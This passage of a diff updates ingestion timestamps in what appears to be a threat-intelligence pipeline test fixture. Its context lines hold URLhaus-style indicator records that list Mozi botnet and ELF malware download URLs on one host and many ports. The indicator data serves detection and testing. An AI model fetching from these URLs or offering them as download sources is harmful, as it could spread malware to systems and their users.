listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9406,7 +9406,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025894500Z", + "ingested": "2021-12-14T14:56:15.726464305Z", "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://89.160.20.156:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9455,7 +9455,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025901400Z", + "ingested": "2021-12-14T14:56:15.726464667Z", "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://89.160.20.156:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9504,7 +9504,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025908100Z", + "ingested": "2021-12-14T14:56:15.726465023Z", "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://89.160.20.156:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025916700Z", + "ingested": "2021-12-14T14:56:15.726465380Z", "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://89.160.20.156:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9602,7 +9602,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025924Z", + "ingested": "2021-12-14T14:56:15.726465806Z", "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://89.160.20.156:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9651,7 +9651,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025931Z", + "ingested": "2021-12-14T14:56:15.726466271Z", "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://89.160.20.156:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9700,7 +9700,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025937900Z", + "ingested": "2021-12-14T14:56:15.726466640Z", "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://89.160.20.156:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9750,7 +9750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025944900Z", + "ingested": "2021-12-14T14:56:15.726467006Z", "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://89.160.20.156:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -9799,7 +9799,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025951800Z", + "ingested": "2021-12-14T14:56:15.726467386Z", "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://89.160.20.156:41921/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -9849,7 +9849,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025958700Z", + "ingested": "2021-12-14T14:56:15.726467895Z", "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://89.160.20.156:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -9898,7 +9898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025965700Z", + "ingested": "2021-12-14T14:56:15.726468249Z", "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://89.160.20.156:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9947,7 +9947,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025972500Z", + "ingested": "2021-12-14T14:56:15.726468619Z", "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://89.160.20.156:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9996,7 +9996,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025979400Z", + "ingested": "2021-12-14T14:56:15.726468984Z", "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://89.160.20.156:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10045,7 +10045,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025986300Z", + "ingested": "2021-12-14T14:56:15.726469351Z", "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://89.160.20.156:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10094,7 +10094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025993200Z", + "ingested": "2021-12-14T14:56:15.726469766Z", "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://89.160.20.156:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10143,7 +10143,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026000400Z", + "ingested": "2021-12-14T14:56:15.726470124Z", "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://89.160.20.156:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10192,7 +10192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026007400Z", + "ingested": "2021-12-14T14:56:15.726470481Z", "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://89.160.20.156:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10241,7 +10241,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026014300Z", + "ingested": "2021-12-14T14:56:15.726470845Z", "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://89.160.20.156:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10290,7 +10290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026021300Z", + "ingested": "2021-12-14T14:56:15.726471437Z", "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10339,7 +10339,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026028300Z", + "ingested": "2021-12-14T14:56:15.726471796Z", "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://89.160.20.156:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10388,7 +10388,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026035200Z", + "ingested": "2021-12-14T14:56:15.726472149Z", "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://89.160.20.156:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10437,7 +10437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026042300Z", + "ingested": "2021-12-14T14:56:15.726473235Z", "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://89.160.20.156:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10486,7 +10486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026049300Z", + "ingested": "2021-12-14T14:56:15.726473599Z", "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://89.160.20.156:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10535,7 +10535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026056200Z", + "ingested": "2021-12-14T14:56:15.726474097Z", "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://89.160.20.156:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10584,7 +10584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026063200Z", + "ingested": "2021-12-14T14:56:15.726474463Z", "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://89.160.20.156:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10633,7 +10633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026070Z", + "ingested": "2021-12-14T14:56:15.726474852Z", "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://89.160.20.156:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10682,7 +10682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026076900Z", + "ingested": "2021-12-14T14:56:15.726475227Z", "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://89.160.20.156:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10731,7 +10731,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026083900Z", + "ingested": "2021-12-14T14:56:15.726475688Z", "original": "{\"id\":\"961328\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961328/\",\"url\":\"http://89.160.20.156:60680/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10780,7 +10780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026090800Z", + "ingested": "2021-12-14T14:56:15.726476097Z", "original": "{\"id\":\"961329\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961329/\",\"url\":\"http://89.160.20.156:51132/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10829,7 +10829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026097700Z", + "ingested": "2021-12-14T14:56:15.726476456Z", "original": "{\"id\":\"961330\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961330/\",\"url\":\"http://89.160.20.156:39049/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10878,7 +10878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026104600Z", + "ingested": "2021-12-14T14:56:15.726476809Z", "original": "{\"id\":\"961321\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961321/\",\"url\":\"http://89.160.20.156:57455/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10927,7 +10927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026111400Z", + "ingested": "2021-12-14T14:56:15.726477168Z", "original": "{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://89.160.20.156:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10976,7 +10976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026118300Z", + "ingested": "2021-12-14T14:56:15.726477629Z", "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://89.160.20.156:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11025,7 +11025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026125200Z", + "ingested": "2021-12-14T14:56:15.726477992Z", "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://89.160.20.156:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11075,7 +11075,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026132200Z", + "ingested": "2021-12-14T14:56:15.726478381Z", "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://89.160.20.156:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -11124,7 +11124,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026170200Z", + "ingested": "2021-12-14T14:56:15.726478801Z", "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://89.160.20.156:50971/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -11173,7 +11173,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026178200Z", + "ingested": "2021-12-14T14:56:15.726479300Z", "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://89.160.20.156:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11222,7 +11222,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026185200Z", + "ingested": "2021-12-14T14:56:15.726479755Z", "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://89.160.20.156:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11271,7 +11271,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026192200Z", + "ingested": "2021-12-14T14:56:15.726480108Z", "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://89.160.20.156:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11320,7 +11320,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026199100Z", + "ingested": "2021-12-14T14:56:15.726480464Z", "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://89.160.20.156:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11369,7 +11369,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026205900Z", + "ingested": "2021-12-14T14:56:15.726480890Z", "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://89.160.20.156:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11418,7 +11418,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026212900Z", + "ingested": "2021-12-14T14:56:15.726481420Z", "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://89.160.20.156:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11467,7 +11467,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026219700Z", + "ingested": "2021-12-14T14:56:15.726481774Z", "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://89.160.20.156:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -11516,7 +11516,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026226500Z", + "ingested": "2021-12-14T14:56:15.726482126Z", "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://89.160.20.156:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 